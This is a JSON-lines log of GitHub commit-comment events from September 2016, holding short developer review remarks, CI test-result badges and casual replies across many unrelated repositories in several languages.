{"id":"4627581772","type":"CommitCommentEvent","actor":{"login":"craigminihan"},"repo":{"name":"RipcordSoftware/thread-pool-cpp"},"payload":{"comment":{"id":19199734,"position":5,"line":5,"path":"thread_pool/worker.cpp","commit_id":"89726c3384b6bdf4f066dc1c95cd9b8c2b997a53","created_at":"2016-09-27T23:25:24Z","updated_at":"2016-09-27T23:25:24Z","body":"clang++ on OSX was very upset by thread_local. To support OSX we must remove it - sigh."}},"created_at":"2016-09-27T23:25:24Z"}
{"id":"4627590993","type":"CommitCommentEvent","actor":{"login":"YorickPeterse"},"repo":{"name":"YorickPeterse/oga"},"payload":{"comment":{"id":19199750,"position":null,"line":null,"path":null,"commit_id":"e0e0687dc29427c854c9fa6d3c19cee1c04f92c7","created_at":"2016-09-27T23:28:05Z","updated_at":"2016-09-27T23:28:05Z","body":"@scotchi Yes, such additions are more than welcome."}},"created_at":"2016-09-27T23:28:05Z"}
{"id":"4627592113","type":"CommitCommentEvent","actor":{"login":"niphlod"},"repo":{"name":"web2py/web2py"},"payload":{"comment":{"id":19199752,"position":null,"line":null,"path":null,"commit_id":"e5355b5b12a7de1ee93bee6ab91fd2b79260706a","created_at":"2016-09-27T23:28:20Z","updated_at":"2016-09-27T23:28:20Z","body":"I know, sorry. Actually I made another PR with a \"scientific fix\"\n(ASSIGNJS) but some tests on the compiled view results screamed...\n\nIl 28 set 2016 00:15, \"mdipierro\" <notifications@github.com> ha scritto:\n\n> Actually this breaks it. I had to revert. The best I could to make it\n> backward compatible and follow a sane default was to use '...' instead of\n> \"...\" everywhere. T.M() was really not thought to be used in this way.\n> Reverted in 78cc6d6\n> <https://github.com/web2py/web2py/commit/78cc6d69a29921d7dfd6fa207e8220f47eabeed8>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/web2py/web2py/commit/e5355b5b12a7de1ee93bee6ab91fd2b79260706a#commitcomment-19199057>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHdB1KqBRUppG45veB6NHfHa9j0dXl1ks5quZVwgaJpZM4KFn-0>\n> .\n>\n"}},"created_at":"2016-09-27T23:28:20Z"}
{"id":"4627595500","type":"CommitCommentEvent","actor":{"login":"vitreuz"},"repo":{"name":"h2oai/steam"},"payload":{"comment":{"id":19199756,"position":null,"line":null,"path":null,"commit_id":"9bd3cee5a9c1c3c8297f5a33900aa0f822411b7c","created_at":"2016-09-27T23:29:18Z","updated_at":"2016-09-27T23:29:18Z","body":"Should be STEAM-525"}},"created_at":"2016-09-27T23:29:18Z"}
{"id":"4627615568","type":"CommitCommentEvent","actor":{"login":"t-walker"},"repo":{"name":"t-walker/samplegithub"},"payload":{"comment":{"id":19199795,"position":null,"line":null,"path":null,"commit_id":"81adf9c51f3eec4cf344264833da14c736f12a5c","created_at":"2016-09-27T23:34:54Z","updated_at":"2016-09-27T23:34:54Z","body":"This is a stupid change; don't do it. "}},"created_at":"2016-09-27T23:34:54Z"}
{"id":"4627624704","type":"CommitCommentEvent","actor":{"login":"hdubel94"},"repo":{"name":"richlvnsn/tcnj_ic2"},"payload":{"comment":{"id":19199816,"position":null,"line":null,"path":null,"commit_id":"45d0488789d0582b8b31f6f277bb2a27cb9d0c12","created_at":"2016-09-27T23:37:32Z","updated_at":"2016-09-27T23:37:32Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Research Vivado design flow using TCL scripts](https://trello.com/c/iZjzDIuO/11-research-vivado-design-flow-using-tcl-scripts)"}},"created_at":"2016-09-27T23:37:32Z"}
{"id":"4627625352","type":"CommitCommentEvent","actor":{"login":"catdad"},"repo":{"name":"catdad/grandma"},"payload":{"comment":{"id":19199819,"position":null,"line":null,"path":null,"commit_id":"696cd67cde79328aaf3d066365c234fb43146a5a","created_at":"2016-09-27T23:37:43Z","updated_at":"2016-09-27T23:37:43Z","body":"#96 "}},"created_at":"2016-09-27T23:37:43Z"}
{"id":"4627632185","type":"CommitCommentEvent","actor":{"login":"blairmacintyre"},"repo":{"name":"argonjs/nativescript-screen-orientation"},"payload":{"comment":{"id":19199830,"position":null,"line":null,"path":null,"commit_id":"d18a3bb17fd986f7843efd0b81e2727ff91a3a07","created_at":"2016-09-27T23:39:39Z","updated_at":"2016-09-27T23:39:39Z","body":"No ideas right now.  I haven't looked into it, I've got \"bigger problems to solve\" :)\r\nIt would be great to figure out though."}},"created_at":"2016-09-27T23:39:39Z"}
{"id":"4627641624","type":"CommitCommentEvent","actor":{"login":"kaelig"},"repo":{"name":"Financial-Times/origami-build-service"},"payload":{"comment":{"id":19199843,"position":null,"line":null,"path":null,"commit_id":"dd6e164eb51c26a5afa291ca055a4d5bc5391b05","created_at":"2016-09-27T23:42:32Z","updated_at":"2016-09-27T23:42:32Z","body":"KL must be Kornel!"}},"created_at":"2016-09-27T23:42:32Z"}
{"id":"4627642898","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19199846,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-27T23:42:57Z","updated_at":"2016-09-27T23:42:57Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1195 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-67.59%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.7%25-red.svg)</a>\n"}},"created_at":"2016-09-27T23:42:57Z"}
{"id":"4627644931","type":"CommitCommentEvent","actor":{"login":"mzdr"},"repo":{"name":"mzdr/macOS"},"payload":{"comment":{"id":19199849,"position":null,"line":null,"path":null,"commit_id":"a72aeef13c68722b6fe2900b3aa9d878f4306e7d","created_at":"2016-09-27T23:43:35Z","updated_at":"2016-09-27T23:43:35Z","body":"Oh shoot! Maybe I should make this part about the git user/email configurable when running the install script. 😆 "}},"created_at":"2016-09-27T23:43:35Z"}
{"id":"4627645693","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19199853,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-27T23:43:49Z","updated_at":"2016-09-27T23:43:49Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-27T23:43:49Z"}
{"id":"4627645731","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19199854,"position":null,"line":null,"path":null,"commit_id":"8274b354ace464b089406339bef31c316cc9d78d","created_at":"2016-09-27T23:43:50Z","updated_at":"2016-09-27T23:43:50Z","body":"L25 calibrate.pug\r\n`td #{calibrate.ECMS_Attributes[0].last_cal.toDateString()}`\r\nworks too."}},"created_at":"2016-09-27T23:43:50Z"}
{"id":"4627648589","type":"CommitCommentEvent","actor":{"login":"Paul-Franklin"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19199860,"position":null,"line":null,"path":null,"commit_id":"8e5e836bf88cf48bfddfb1298c13e54aa7fa3317","created_at":"2016-09-27T23:44:43Z","updated_at":"2016-09-27T23:44:43Z","body":"I know nothing about how the doc system works but just\r\nout of curiosity I wonder why you changed one French\r\nword but not another (at least I am guessing \"et\" is French)."}},"created_at":"2016-09-27T23:44:43Z"}
{"id":"4627650937","type":"CommitCommentEvent","actor":{"login":"jgriffiths"},"repo":{"name":"jgriffiths/libwally-core"},"payload":{"comment":{"id":19199866,"position":null,"line":null,"path":null,"commit_id":"4c8f76fa3e99a302eeb8d3341f0e79e784b2cb31","created_at":"2016-09-27T23:45:23Z","updated_at":"2016-09-27T23:45:23Z","body":"You should see them during make. I'm using:\r\n```\r\n$ gcc --version\r\ngcc (Debian 6.2.0-4) 6.2.0 20160914\r\n```"}},"created_at":"2016-09-27T23:45:23Z"}
{"id":"4627652995","type":"CommitCommentEvent","actor":{"login":"Monroe88"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19199868,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-27T23:45:59Z","updated_at":"2016-09-27T23:45:59Z","body":"Works fine with a bleeding edge build of RA.\r\n\r\n![md joypad 3 button](https://cloud.githubusercontent.com/assets/4119107/18895568/605771ac-84e0-11e6-88ed-ff091aa2fc34.png)\r\n"}},"created_at":"2016-09-27T23:45:59Z"}
{"id":"4627664112","type":"CommitCommentEvent","actor":{"login":"sam-m888"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19199889,"position":null,"line":null,"path":null,"commit_id":"8e5e836bf88cf48bfddfb1298c13e54aa7fa3317","created_at":"2016-09-27T23:49:22Z","updated_at":"2016-09-27T23:49:22Z","body":"Didn't see it!\n\nOn 28 September 2016 at 09:44, Paul Franklin <notifications@github.com>\nwrote:\n\n> I know nothing about how the doc system works but just\n> out of curiosity I wonder why you changed one French\n> word but not another (at least I am guessing \"et\" is French).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gramps-project/gramps/commit/8e5e836bf88cf48bfddfb1298c13e54aa7fa3317#commitcomment-19199860>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIguKf73RC4jJdjAzneGsyObHm1lLtpOks5quaptgaJpZM4KIRg5>\n> .\n>\n"}},"created_at":"2016-09-27T23:49:22Z"}
{"id":"4627664823","type":"CommitCommentEvent","actor":{"login":"diegogarrido"},"repo":{"name":"diegogarrido/semestre2"},"payload":{"comment":{"id":19199892,"position":null,"line":null,"path":null,"commit_id":"5e6ca3770d74a535c8f6f19291313385fe36a745","created_at":"2016-09-27T23:49:35Z","updated_at":"2016-09-27T23:49:35Z","body":"Librería csv"}},"created_at":"2016-09-27T23:49:35Z"}
{"id":"4627668242","type":"CommitCommentEvent","actor":{"login":"monobina"},"repo":{"name":"California-Data-Collaborative/rate-comparison"},"payload":{"comment":{"id":19199901,"position":null,"line":null,"path":null,"commit_id":"dca0d1e569ff520a401b29c474a3f4f4a0386348","created_at":"2016-09-27T23:50:37Z","updated_at":"2016-09-27T23:50:37Z","body":"@christophertull there is a little bug in the cust code checkboxinput. It shows the previous customer class selection results results unless a  checkbox is reclicked for a new selection of a customer class. I made a default select for each customer class but i have to reselect to render the ouput. I am working on fixing that bug. "}},"created_at":"2016-09-27T23:50:37Z"}
{"id":"4627668630","type":"CommitCommentEvent","actor":{"login":"diegogarrido"},"repo":{"name":"diegogarrido/semestre2"},"payload":{"comment":{"id":19199902,"position":null,"line":null,"path":null,"commit_id":"b0d6ca3308f302bfaaa3916e55706ee6409fb3f9","created_at":"2016-09-27T23:50:44Z","updated_at":"2016-09-27T23:50:44Z","body":"Prueba ejecutable, guardado archivo csv"}},"created_at":"2016-09-27T23:50:44Z"}
{"id":"4627668701","type":"CommitCommentEvent","actor":{"login":"dlasky"},"repo":{"name":"andrefuller/strand"},"payload":{"comment":{"id":19199903,"position":30,"line":30,"path":"src/strand-duallist-column/strand-duallist-column.html","commit_id":"7ea0e630bd7ffc2c80a25f50130ee8643361d5d0","created_at":"2016-09-27T23:50:46Z","updated_at":"2016-09-27T23:50:46Z","body":"you might want to just use a dom-repeat here because i know recycler wont be able to deal with the drag and drop stuff they mentioned"}},"created_at":"2016-09-27T23:50:46Z"}
{"id":"4627672938","type":"CommitCommentEvent","actor":{"login":"dlasky"},"repo":{"name":"andrefuller/strand"},"payload":{"comment":{"id":19199916,"position":32,"line":32,"path":"src/strand-duallist-column/strand-duallist-column.html","commit_id":"7ea0e630bd7ffc2c80a25f50130ee8643361d5d0","created_at":"2016-09-27T23:52:00Z","updated_at":"2016-09-27T23:52:00Z","body":"you probably want to make a new list item too given the removal and dragging code? @shuwen @anthonykoerber thoughts?"}},"created_at":"2016-09-27T23:52:00Z"}
{"id":"4627673142","type":"CommitCommentEvent","actor":{"login":"neheb"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":19199917,"position":null,"line":null,"path":null,"commit_id":"600fd467d8e884a9d2d36e996f9680f215bdd0dd","created_at":"2016-09-27T23:52:05Z","updated_at":"2016-09-27T23:52:05Z","body":"wasn't this fixed with OpenSSH 6.7? Actually I just did ssh -vv on a lede router. I don't see ripemd anywhere even though the openssl makefile was not modified. "}},"created_at":"2016-09-27T23:52:05Z"}
{"id":"4627674851","type":"CommitCommentEvent","actor":{"login":"fshp"},"repo":{"name":"Athanasi/dotfiles"},"payload":{"comment":{"id":19199921,"position":null,"line":null,"path":null,"commit_id":"1d496d19274e02a0fc6fa7f5faf6bed6fe19da3b","created_at":"2016-09-27T23:52:37Z","updated_at":"2016-09-27T23:52:37Z","body":"Oh god! Change password, if not yet."}},"created_at":"2016-09-27T23:52:37Z"}
{"id":"4627675030","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"exynos5420/android_device_samsung_v1awifi"},"payload":{"comment":{"id":19199922,"position":7,"line":47,"path":"rootdir/Android.mk","commit_id":"2e90a55b98100885e2151744833dbd245d90d784","created_at":"2016-09-27T23:52:40Z","updated_at":"2016-09-27T23:52:40Z","body":"etc/init.universal5420.power.rc"}},"created_at":"2016-09-27T23:52:40Z"}
{"id":"4627675172","type":"CommitCommentEvent","actor":{"login":"dlasky"},"repo":{"name":"andrefuller/strand"},"payload":{"comment":{"id":19199924,"position":25,"line":25,"path":"src/strand-duallist-column/strand-duallist-column.html","commit_id":"7ea0e630bd7ffc2c80a25f50130ee8643361d5d0","created_at":"2016-09-27T23:52:42Z","updated_at":"2016-09-27T23:52:42Z","body":"i would add some code that lets you turn off count entirely cause i could see use cases where its just not relevant"}},"created_at":"2016-09-27T23:52:42Z"}
{"id":"4627675599","type":"CommitCommentEvent","actor":{"login":"diegogarrido"},"repo":{"name":"diegogarrido/semestre2"},"payload":{"comment":{"id":19199925,"position":null,"line":null,"path":null,"commit_id":"227c6c54a08583552a288695681505acfe262b7a","created_at":"2016-09-27T23:52:50Z","updated_at":"2016-09-27T23:52:50Z","body":"Guardado csv"}},"created_at":"2016-09-27T23:52:50Z"}
{"id":"4627676969","type":"CommitCommentEvent","actor":{"login":"drtakhs"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19199930,"position":null,"line":null,"path":null,"commit_id":"294187bdacb059de245e0b8e0d3161d68a07bfbc","created_at":"2016-09-27T23:53:14Z","updated_at":"2016-09-27T23:53:14Z","body":"<3"}},"created_at":"2016-09-27T23:53:14Z"}
{"id":"4627677772","type":"CommitCommentEvent","actor":{"login":"helfer"},"repo":{"name":"apollostack/apollo-server"},"payload":{"comment":{"id":19199932,"position":13,"line":14,"path":"integrations.md","commit_id":"321847ee5761aa7477da99f0f589a96441a513fe","created_at":"2016-09-27T23:53:28Z","updated_at":"2016-09-27T23:53:28Z","body":"Fixed."}},"created_at":"2016-09-27T23:53:28Z"}
{"id":"4627678077","type":"CommitCommentEvent","actor":{"login":"diegogarrido"},"repo":{"name":"diegogarrido/semestre2"},"payload":{"comment":{"id":19199933,"position":null,"line":null,"path":null,"commit_id":"74bb28980e5552be89f87b688533d93543f97d9b","created_at":"2016-09-27T23:53:35Z","updated_at":"2016-09-27T23:53:35Z","body":"Guardado csv"}},"created_at":"2016-09-27T23:53:35Z"}
{"id":"4627679937","type":"CommitCommentEvent","actor":{"login":"dlasky"},"repo":{"name":"andrefuller/strand"},"payload":{"comment":{"id":19199936,"position":43,"line":43,"path":"src/strand-duallist-column/strand-duallist-column.js","commit_id":"7ea0e630bd7ffc2c80a25f50130ee8643361d5d0","created_at":"2016-09-27T23:54:10Z","updated_at":"2016-09-27T23:54:10Z","body":"using data.* this will fire 2x in some situations (shouldnt hurt with what you have there, just be aware if you add more stuff here)"}},"created_at":"2016-09-27T23:54:10Z"}
{"id":"4627687495","type":"CommitCommentEvent","actor":{"login":"dlasky"},"repo":{"name":"andrefuller/strand"},"payload":{"comment":{"id":19199955,"position":39,"line":39,"path":"src/strand-duallist/strand-duallist.html","commit_id":"7ea0e630bd7ffc2c80a25f50130ee8643361d5d0","created_at":"2016-09-27T23:56:19Z","updated_at":"2016-09-27T23:56:19Z","body":"great approach here"}},"created_at":"2016-09-27T23:56:19Z"}
{"id":"4627691490","type":"CommitCommentEvent","actor":{"login":"Andreacg"},"repo":{"name":"kozartt/Parcial-LabProg1"},"payload":{"comment":{"id":19199967,"position":30,"line":30,"path":"src/dsadsa/Dsadsa.java","commit_id":"541adbea06f2073a0e636e679519c91fd49e4c1f","created_at":"2016-09-27T23:57:33Z","updated_at":"2016-09-27T23:57:33Z","body":"\\n5 - Calcular perímero del pentágono."}},"created_at":"2016-09-27T23:57:33Z"}
{"id":"4627694617","type":"CommitCommentEvent","actor":{"login":"dlasky"},"repo":{"name":"andrefuller/strand"},"payload":{"comment":{"id":19199980,"position":34,"line":34,"path":"src/strand-duallist/strand-duallist.html","commit_id":"7ea0e630bd7ffc2c80a25f50130ee8643361d5d0","created_at":"2016-09-27T23:58:31Z","updated_at":"2016-09-27T23:58:31Z","body":"if you are going to inline this vs using a content tag, you defintely want to expose the search value as bindable.\r\n\r\nyou might want to look at the design of dropdown though to see why we did it with a content tag (its easier to control the field from a parent controller view)"}},"created_at":"2016-09-27T23:58:31Z"}
{"id":"4627699092","type":"CommitCommentEvent","actor":{"login":"EduardQF"},"repo":{"name":"EduardQF/Proyecto.Fundamentos"},"payload":{"comment":{"id":19199992,"position":null,"line":null,"path":null,"commit_id":"2df86869f8c02d8d4a09685fff0ddf50991a6e7a","created_at":"2016-09-27T23:59:52Z","updated_at":"2016-09-27T23:59:52Z","body":"carpeta conectada con el pc de Eduardo Queupumil"}},"created_at":"2016-09-27T23:59:52Z"}
{"id":"4621698127","type":"CommitCommentEvent","actor":{"login":"JSFRAGOSO"},"repo":{"name":"EmpresaFTW/Teste"},"payload":{"comment":{"id":19184069,"position":null,"line":null,"path":null,"commit_id":"12a6c128439df94ffeccefa12fbd7a684a7be871","created_at":"2016-09-27T03:00:50Z","updated_at":"2016-09-27T03:00:50Z","body":"Comentário foda\r\n"}},"created_at":"2016-09-27T03:00:50Z"}
{"id":"4621698130","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184070,"position":12,"line":12,"path":"index.html","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:00:50Z","updated_at":"2016-09-27T03:00:50Z","body":"All these `<link>` tags should be nested in the `<head>` tag."}},"created_at":"2016-09-27T03:00:50Z"}
{"id":"4621699851","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184071,"position":15,"line":15,"path":"index.html","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:01:31Z","updated_at":"2016-09-27T03:01:31Z","body":"Didn't need the inner span, you've should've just given the `<a>` tag the id."}},"created_at":"2016-09-27T03:01:31Z"}
{"id":"4621702419","type":"CommitCommentEvent","actor":{"login":"dearsq"},"repo":{"name":"Saisimon/tip"},"payload":{"comment":{"id":19184079,"position":null,"line":null,"path":null,"commit_id":"894175a57992a53b2d371fafafb7c5a58d474a04","created_at":"2016-09-27T03:02:30Z","updated_at":"2016-09-27T03:02:30Z","body":"不不不，这次的作业里面有查看二进制文件的任务。\r\n特意修改了两个有代表性的，对比下差异可以更容易找到作业里面所说的“函数入口”。"}},"created_at":"2016-09-27T03:02:30Z"}
{"id":"4621703592","type":"CommitCommentEvent","actor":{"login":"terrajobst"},"repo":{"name":"dotnet/standard"},"payload":{"comment":{"id":19184081,"position":null,"line":null,"path":null,"commit_id":"014881be5655148b8fd9e69d3fd7fbdc928ba2a2","created_at":"2016-09-27T03:02:57Z","updated_at":"2016-09-27T03:02:57Z","body":"Already known."}},"created_at":"2016-09-27T03:02:57Z"}
{"id":"4621704162","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184083,"position":25,"line":25,"path":"index.html","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:03:10Z","updated_at":"2016-09-27T03:03:10Z","body":"Instead of using a break tag, you should have given this section an inner wrapper and given it a width."}},"created_at":"2016-09-27T03:03:10Z"}
{"id":"4621705102","type":"CommitCommentEvent","actor":{"login":"TaitonProject"},"repo":{"name":"TaitonProject/ThirdSpringMVC"},"payload":{"comment":{"id":19184086,"position":20,"line":28,"path":"src/main/java/com/mycompany/controller/HomeController.java","commit_id":"9e9fc3cf8aacc9b4e8c7f01116457d537afbb22b","created_at":"2016-09-27T03:03:30Z","updated_at":"2016-09-27T03:03:30Z","body":"ну вот тут надо бы еще сделать ajax, все дела"}},"created_at":"2016-09-27T03:03:30Z"}
{"id":"4621706049","type":"CommitCommentEvent","actor":{"login":"gibraltar"},"repo":{"name":"fortify-communications/ADMozaicCollectionViewLayout"},"payload":{"comment":{"id":19184091,"position":null,"line":null,"path":null,"commit_id":"34196d51edb38a2ea9961079ccd0240e69b0e510","created_at":"2016-09-27T03:03:51Z","updated_at":"2016-09-27T03:03:51Z","body":"Merging Swift 3.0 compatibility"}},"created_at":"2016-09-27T03:03:51Z"}
{"id":"4621707274","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19184092,"position":null,"line":null,"path":null,"commit_id":"3280e453f66055fa5547798dc3467b532da79bef","created_at":"2016-09-27T03:04:16Z","updated_at":"2016-09-27T03:04:16Z","body":"No, because it tells you not to do it."}},"created_at":"2016-09-27T03:04:16Z"}
{"id":"4621709839","type":"CommitCommentEvent","actor":{"login":"hhlohwv"},"repo":{"name":"hhlohwv/426-Project"},"payload":{"comment":{"id":19184095,"position":null,"line":null,"path":null,"commit_id":"cfe175d92fa93ad2a673df66297eac1f166f1840","created_at":"2016-09-27T03:05:18Z","updated_at":"2016-09-27T03:05:18Z","body":"Can you see this comment?"}},"created_at":"2016-09-27T03:05:18Z"}
{"id":"4621711075","type":"CommitCommentEvent","actor":{"login":"shuleihen"},"repo":{"name":"shuleihen/TDjuwairen"},"payload":{"comment":{"id":19184097,"position":33,"line":281,"path":"TDjuwairen/Modules/MyCenter/Setting/MessageChildTableViewController.m","commit_id":"9fc5ad0caea61290234d999ddb5999d3957072e4","created_at":"2016-09-27T03:05:46Z","updated_at":"2016-09-27T03:05:46Z","body":"block 参数不处理可以填nil，不用空这么多空行放着"}},"created_at":"2016-09-27T03:05:46Z"}
{"id":"4621716162","type":"CommitCommentEvent","actor":{"login":"shuleihen"},"repo":{"name":"shuleihen/TDjuwairen"},"payload":{"comment":{"id":19184118,"position":26,"line":57,"path":"TDjuwairen/AppDelegate.m","commit_id":"e4f99631762b775d03a0d32ab7ae3c7d9cf5f82a","created_at":"2016-09-27T03:07:43Z","updated_at":"2016-09-27T03:07:43Z","body":"不用将代码堆砌到 didFinishLaunch里面"}},"created_at":"2016-09-27T03:07:43Z"}
{"id":"4621717374","type":"CommitCommentEvent","actor":{"login":"Riteshlogin"},"repo":{"name":"Pitt-RAS/cleanflight"},"payload":{"comment":{"id":19184121,"position":19,"line":549,"path":"src/main/rx/rx.c","commit_id":"30b49bd79ea055c84894a9e685e3e0621f7ac192","created_at":"2016-09-27T03:08:11Z","updated_at":"2016-09-27T03:08:11Z","body":"Should there be a closing bracket somewhere here? I can't see the entire file in the view I'm currently in so I'm not entirely sure, but I see no closing brackets before the else."}},"created_at":"2016-09-27T03:08:11Z"}
{"id":"4621718218","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19184123,"position":null,"line":null,"path":null,"commit_id":"3280e453f66055fa5547798dc3467b532da79bef","created_at":"2016-09-27T03:08:30Z","updated_at":"2016-09-27T03:08:30Z","body":"But you still can't blacklist user \"show\", is what I meant"}},"created_at":"2016-09-27T03:08:30Z"}
{"id":"4621720101","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184128,"position":40,"line":40,"path":"index.html","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:09:15Z","updated_at":"2016-09-27T03:09:15Z","body":"This should be a `<blockquote>`. The `<q>` tag is used for quoting sources."}},"created_at":"2016-09-27T03:09:15Z"}
{"id":"4621722940","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184132,"position":46,"line":46,"path":"index.html","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:10:26Z","updated_at":"2016-09-27T03:10:26Z","body":"You could use `text-align: center;` or `margin: 0 auto;` to center the element. Let's not use the center tag."}},"created_at":"2016-09-27T03:10:26Z"}
{"id":"4621724005","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184135,"position":53,"line":53,"path":"index.html","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:10:52Z","updated_at":"2016-09-27T03:10:52Z","body":"You should use margin or padding here instead of a break tag."}},"created_at":"2016-09-27T03:10:52Z"}
{"id":"4621725391","type":"CommitCommentEvent","actor":{"login":"bjrambo"},"repo":{"name":"kijin/xe-supercache"},"payload":{"comment":{"id":19184138,"position":4,"line":312,"path":"supercache.model.php","commit_id":"d0841882bf1824b95529a7584730550cf58473ae","created_at":"2016-09-27T03:11:27Z","updated_at":"2016-09-27T03:11:27Z","body":"궁금한것..\r\n\r\n이건 혹시 서버의 PHP에러를 기록하는 구간에 여기에 보이는 코드들을 문서화해서 보여주는방식인가요? debugPrint처럼요."}},"created_at":"2016-09-27T03:11:27Z"}
{"id":"4621727389","type":"CommitCommentEvent","actor":{"login":"amiller27"},"repo":{"name":"Pitt-RAS/cleanflight"},"payload":{"comment":{"id":19184146,"position":19,"line":549,"path":"src/main/rx/rx.c","commit_id":"30b49bd79ea055c84894a9e685e3e0621f7ac192","created_at":"2016-09-27T03:12:16Z","updated_at":"2016-09-27T03:12:16Z","body":"It's two lines up.  If you click the weird foldy symbol at the left side of the blue line, it expands the code."}},"created_at":"2016-09-27T03:12:16Z"}
{"id":"4621731155","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184154,"position":131,"line":131,"path":"css/style.css","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:13:44Z","updated_at":"2016-09-27T03:13:44Z","body":"hmm, why do you have position and left set here?"}},"created_at":"2016-09-27T03:13:44Z"}
{"id":"4621731419","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184155,"position":123,"line":123,"path":"css/style.css","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:13:51Z","updated_at":"2016-09-27T03:13:51Z","body":"hmm, why do you have position and left set here?"}},"created_at":"2016-09-27T03:13:51Z"}
{"id":"4621735372","type":"CommitCommentEvent","actor":{"login":"TigardRobotics"},"repo":{"name":"TigardRobotics/ftc_app"},"payload":{"comment":{"id":19184158,"position":null,"line":null,"path":null,"commit_id":"94c6d46ccefb1d778b90b7426e69d97828a9adfb","created_at":"2016-09-27T03:15:27Z","updated_at":"2016-09-27T03:15:27Z","body":"Updates from First"}},"created_at":"2016-09-27T03:15:27Z"}
{"id":"4621735525","type":"CommitCommentEvent","actor":{"login":"JoshSmith"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19184159,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-27T03:15:31Z","updated_at":"2016-09-27T03:15:31Z","body":"Can you clarify what this means? A pull request on Circle will not get reporting, but another branch will? My guess is that you only want this to happen on the branch for which Inch CI is displaying its reporting."}},"created_at":"2016-09-27T03:15:31Z"}
